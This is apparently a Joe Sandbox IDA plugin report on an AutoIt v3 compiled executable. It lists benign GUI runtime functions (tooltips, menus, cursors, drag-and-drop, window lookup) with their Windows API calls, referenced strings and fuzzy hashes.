RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00B9AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B9ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B9ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00B9ACEC
DrawFocusRect.USER32(?,?), ref: 00B9ACF7
GetSysColor.USER32(00000011), ref: 00B9AD05
SetTextColor.GDI32(?,00000000), ref: 00B9AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B9AD21
SelectObject.GDI32(?,00B9A869), ref: 00B9AD38
DeleteObject.GDI32(?), ref: 00B9AD43
SelectObject.GDI32(?,?), ref: 00B9AD49
DeleteObject.GDI32(?), ref: 00B9AD4E
SetTextColor.GDI32(?,?), ref: 00B9AD54
SetBkColor.GDI32(?,?), ref: 00B9AD5E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: a16b9935156b7715411b89ccd9c1a124fc6e3c8dccd8c2d7d5b2e0560fff5652
Instruction ID: cbbaf6d807573fd6074e6305ab60d5be32ff88b424cab0800a0d472eb109446c
Opcode Fuzzy Hash: a16b9935156b7715411b89ccd9c1a124fc6e3c8dccd8c2d7d5b2e0560fff5652
Instruction Fuzzy Hash: FE616D71900219EFDF119FA8DD48EAE7BB9EF08320F214166F915EB2A1DA719D40DB90

Function 00B98C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B98D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B98D45
CharNextW.USER32(0000014E), ref: 00B98D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B98DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B98DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B98DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B98DF9
SetWindowTextW.USER32(?,0000014E), ref: 00B98E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B98E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B98E8C
_memset.LIBCMT ref: 00B98EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B98EFA
_memset.LIBCMT ref: 00B98F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B98F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B98FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00B99088
InvalidateRect.USER32(?,00000000,00000001), ref: 00B990AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B990F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B99121
DrawMenuBar.USER32(?), ref: 00B99130
SetWindowTextW.USER32(?,0000014E), ref: 00B99158

Strings

0, xrefs: 00B990C2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 5153ef7a1529b3aa65b7b4246d3f159b6d69c913e99cca170f51463825448997
Instruction ID: f4cdbff7d00f458fcd02d830c4f77a4d327be5b44fdf2c75cdc8bb9708ac9e56
Opcode Fuzzy Hash: 5153ef7a1529b3aa65b7b4246d3f159b6d69c913e99cca170f51463825448997
Instruction Fuzzy Hash: 62E16474901219ABDF109F64CC84EEE7BF9FF06710F1081AAF915AB1A1DB708A45DF60

Function 00B94B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B94C51
GetDesktopWindow.USER32 ref: 00B94C66
GetWindowRect.USER32(00000000), ref: 00B94C6D
GetWindowLongW.USER32(?,000000F0), ref: 00B94CCF
DestroyWindow.USER32(?), ref: 00B94CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B94D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B94D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B94D68
SendMessageW.USER32(?,00000421,?,?), ref: 00B94D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B94D90
IsWindowVisible.USER32(?), ref: 00B94DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B94DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B94DDF
GetWindowRect.USER32(?,?), ref: 00B94DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00B94E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00B94E37
CopyRect.USER32(?,?), ref: 00B94E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00B94EB9

Strings

(, xrefs: 00B94E2A
0, xrefs: 00B94BFC
tooltips_class32, xrefs: 00B94D1D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b5a968a0b04f8ad11a81dba44a7dd91415d2612fdf68cc0a7a00c78be5c4dcee
Instruction ID: 2a6406cb60363fa4e5936c56b79ca47e3dbf7c5f46c7caa97328ebd252d21efa
Opcode Fuzzy Hash: b5a968a0b04f8ad11a81dba44a7dd91415d2612fdf68cc0a7a00c78be5c4dcee
Instruction Fuzzy Hash: 28B15771608341AFDB04DF24C985B6ABBE4FF88314F008969F5999B2A1DB71EC45CB91

Function 00B127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B128BC
GetSystemMetrics.USER32(00000007), ref: 00B128C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B128EF
GetSystemMetrics.USER32(00000008), ref: 00B128F7
GetSystemMetrics.USER32(00000004), ref: 00B1291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B12939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B12949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B1297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B12990
GetClientRect.USER32(00000000,000000FF), ref: 00B129AE
GetStockObject.GDI32(00000011), ref: 00B129CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B129D5

Part of subcall function 00B12344: GetCursorPos.USER32(?), ref: 00B12357
Part of subcall function 00B12344: ScreenToClient.USER32(00BD67B0,?), ref: 00B12374
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000001), ref: 00B12399
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000002), ref: 00B123A7

SetTimer.USER32(00000000,00000000,00000028,00B11256), ref: 00B129FC

Strings

AutoIt v3 GUI, xrefs: 00B12974

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 7cb8c35bda98f840104de0b88e893e2d051da44a18b4f4cab1730ec794262979
Instruction ID: 81735646e3eef08cba82447bf0013d7a28e0567a9da3622e4f4df7a5a83b68ec
Opcode Fuzzy Hash: 7cb8c35bda98f840104de0b88e893e2d051da44a18b4f4cab1730ec794262979
Instruction Fuzzy Hash: 3FB18B71A0120AEFDB14DFA8DD85BEE7BE4FB08710F10816AFA15E72A0DB749950CB50

Function 00B94069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B940F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B941B6

Strings

SELECTALL, xrefs: 00B9421D
GETSELECTED, xrefs: 00B942E4
ISSELECTED, xrefs: 00B941C1
SELECT, xrefs: 00B94250
SELECTINVERT, xrefs: 00B94286
GETSELECTEDCOUNT, xrefs: 00B94199
SELECTCLEAR, xrefs: 00B94235
GETSUBITEMCOUNT, xrefs: 00B94141
DESELECT, xrefs: 00B942A4
FINDITEM, xrefs: 00B94329
GETTEXT, xrefs: 00B9415F
GETITEMCOUNT, xrefs: 00B94128
VIEWCHANGE, xrefs: 00B94375

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: b8a699df8356f35c134857601cf86aa28733a21576b6e9e007d823a254c2cf02
Instruction ID: 69e4d8a6222c5d03e684bc45e3b4c0536a7dd421f6e2d9dbbf275fa9254de005
Opcode Fuzzy Hash: b8a699df8356f35c134857601cf86aa28733a21576b6e9e007d823a254c2cf02
Instruction Fuzzy Hash: BDA141302243419BCB14EF20C9A1E6AB7E9FF54314F1489FDB8969B692DB30ED46CB51

Function 00B852F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00B85309
LoadCursorW.USER32(00000000,00007F8A), ref: 00B85314
LoadCursorW.USER32(00000000,00007F00), ref: 00B8531F
LoadCursorW.USER32(00000000,00007F03), ref: 00B8532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00B85335
LoadCursorW.USER32(00000000,00007F01), ref: 00B85340
LoadCursorW.USER32(00000000,00007F81), ref: 00B8534B
LoadCursorW.USER32(00000000,00007F88), ref: 00B85356
LoadCursorW.USER32(00000000,00007F80), ref: 00B85361
LoadCursorW.USER32(00000000,00007F86), ref: 00B8536C
LoadCursorW.USER32(00000000,00007F83), ref: 00B85377
LoadCursorW.USER32(00000000,00007F85), ref: 00B85382
LoadCursorW.USER32(00000000,00007F82), ref: 00B8538D
LoadCursorW.USER32(00000000,00007F84), ref: 00B85398
LoadCursorW.USER32(00000000,00007F04), ref: 00B853A3
LoadCursorW.USER32(00000000,00007F02), ref: 00B853AE
GetCursorInfo.USER32(?), ref: 00B853BE
GetLastError.KERNEL32(00000001,00000000), ref: 00B853E9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 7382bf11dbf03e1b6487c40e4e6507151b523f0d2af2a04e4d7d788c82a53739
Instruction ID: fd40430ccd94c880df2a1e4dd9b0b22a11759588418ea0798cebcf69bcd3dc11
Opcode Fuzzy Hash: 7382bf11dbf03e1b6487c40e4e6507151b523f0d2af2a04e4d7d788c82a53739
Instruction Fuzzy Hash: 9A415470E443196ADB209FB68C4996EFFF8EF51B50B10456FE509E7290DAB89401CF61

Function 00B6AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B6AAA5
__swprintf.LIBCMT ref: 00B6AB46
_wcscmp.LIBCMT ref: 00B6AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B6ABAE
_wcscmp.LIBCMT ref: 00B6ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00B6AC21
GetDlgCtrlID.USER32(?), ref: 00B6AC73
GetWindowRect.USER32(?,?), ref: 00B6ACA9
GetParent.USER32(?), ref: 00B6ACC7
ScreenToClient.USER32(00000000), ref: 00B6ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00B6AD48
_wcscmp.LIBCMT ref: 00B6AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00B6AD82
_wcscmp.LIBCMT ref: 00B6AD96

Part of subcall function 00B3386C: _iswctype.LIBCMT ref: 00B33874

Strings

%s%u, xrefs: 00B6AB40

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: c9b474ec827d441395dd42a02441091e4fff7539444b8c0da73c7d2b665ad33a
Instruction ID: a114e07f686dbe53cf84ba8b794368d2f79391b849cdcfb03b91d3cd755d97b2
Opcode Fuzzy Hash: c9b474ec827d441395dd42a02441091e4fff7539444b8c0da73c7d2b665ad33a
Instruction Fuzzy Hash: 65A1CF71204306AFDB14DF64C884BAAB7E8FF04355F1086A9F999E2190DB38E955CF92

Function 00B6B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00B6B3DB
_wcscmp.LIBCMT ref: 00B6B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00B6B414
CharUpperBuffW.USER32(?,00000000), ref: 00B6B431
_wcscmp.LIBCMT ref: 00B6B44F
_wcsstr.LIBCMT ref: 00B6B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00B6B498
_wcscmp.LIBCMT ref: 00B6B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00B6B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00B6B518
_wcscmp.LIBCMT ref: 00B6B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00B6B550
GetWindowRect.USER32(00000004,?), ref: 00B6B5B9

Strings

@, xrefs: 00B6B3BC
ThumbnailClass, xrefs: 00B6B4A3, 00B6B523

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 8c525e6f4d359a177b9ec88be7a036d6dea01458a214e925fe9679aeeaed6c61
Instruction ID: a8cddd0bb87928fc5a214e6b5f91083e35cec5fa77300dcc36ccaee495c93f58
Opcode Fuzzy Hash: 8c525e6f4d359a177b9ec88be7a036d6dea01458a214e925fe9679aeeaed6c61
Instruction Fuzzy Hash: 4481AF710083069BDB10DF10C985FAAB7E8EF54714F1485AAFD86CA192DB38DD85CB61

Function 00B6B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B6B23F

Strings

[ALL, xrefs: 00B6B2E5
CLASSNAME=, xrefs: 00B6B27C
LAST, xrefs: 00B6B204
[ACTIVE, xrefs: 00B6B22C
ALL, xrefs: 00B6B2D3
[HANDLE:, xrefs: 00B6B24B
REGEXP=, xrefs: 00B6B254
[REGEXPTITLE:, xrefs: 00B6B267
[LAST, xrefs: 00B6B2EC
HANDLE=, xrefs: 00B6B238
[CLASS:, xrefs: 00B6B28F
ACTIVE, xrefs: 00B6B21A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 34ec08a17e86143561b57bcc6bc731f39e73765c5d93a6580e29ce7de4d589fa
Instruction ID: 07192aea8864dedaa318d915301ffe36e3316ef20741bd45d7ce4bb85d4c5f39
Opcode Fuzzy Hash: 34ec08a17e86143561b57bcc6bc731f39e73765c5d93a6580e29ce7de4d589fa
Instruction Fuzzy Hash: 3C31B471A84205E6EB14FA60CD97FEE7BF8AF14B50FA000E9F451B20E2EF656E84C551

Function 00B6C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00B6C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B6C4E6
SetWindowTextW.USER32(?,?), ref: 00B6C4FD
GetDlgItem.USER32(?,000003EA), ref: 00B6C512
SetWindowTextW.USER32(00000000,?), ref: 00B6C518
GetDlgItem.USER32(?,000003E9), ref: 00B6C528
SetWindowTextW.USER32(00000000,?), ref: 00B6C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B6C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B6C569
GetWindowRect.USER32(?,?), ref: 00B6C572
SetWindowTextW.USER32(?,?), ref: 00B6C5DD
GetDesktopWindow.USER32 ref: 00B6C5E3
GetWindowRect.USER32(00000000), ref: 00B6C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B6C636
GetClientRect.USER32(?,?), ref: 00B6C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B6C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B6C693

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 4e1e5b618f90caa521612cca065d22d8812d99b0f07d6e780d800dd54348060f
Instruction ID: 3d81ba282ef62fdbd6236c95588552cb87381a0f68cc889241268a92ef2e3535
Opcode Fuzzy Hash: 4e1e5b618f90caa521612cca065d22d8812d99b0f07d6e780d800dd54348060f
Instruction Fuzzy Hash: 1251707190070AAFDB20DFA8DE85B7EBBF5FF04705F104569E686A35A0CB74A944CB50

Function 00B9A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9A4C8
DestroyWindow.USER32(?,?), ref: 00B9A542

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B9A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B9A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9A5F1
DestroyWindow.USER32(00000000), ref: 00B9A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B10000,00000000), ref: 00B9A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9A663
GetDesktopWindow.USER32 ref: 00B9A67C
GetWindowRect.USER32(00000000), ref: 00B9A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B9A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B9A6B3

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

Strings

tooltips_class32, xrefs: 00B9A5B5, 00B9A643
0, xrefs: 00B9A4DE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: e1f733a5584fa7adb66e04526a32bf94e28406e3d9dc744447facd06b2f6cdd4
Instruction ID: 419a697209915423855c103211c789ecaf6881e155633ed6a19e3e720f5602fb
Opcode Fuzzy Hash: e1f733a5584fa7adb66e04526a32bf94e28406e3d9dc744447facd06b2f6cdd4
Instruction Fuzzy Hash: 90719D71144305AFDB20CF68CC49FAA7BE5FB88704F08456EF985872A0DB75E942DB52

Function 00B9C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DragQueryPoint.SHELL32(?,?), ref: 00B9C917

Part of subcall function 00B9ADF1: ClientToScreen.USER32(?,?), ref: 00B9AE1A
Part of subcall function 00B9ADF1: GetWindowRect.USER32(?,?), ref: 00B9AE90
Part of subcall function 00B9ADF1: PtInRect.USER32(?,?,00B9C304), ref: 00B9AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00B9C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B9C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B9C9AE
_wcscat.LIBCMT ref: 00B9C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B9C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00B9CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B9CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00B9CA47
DragFinish.SHELL32(?), ref: 00B9CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B9CB41

Strings

@GUI_DROPID, xrefs: 00B9CA6E
@GUI_DRAGID, xrefs: 00B9CAB9
@GUI_DRAGFILE, xrefs: 00B9CAF0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
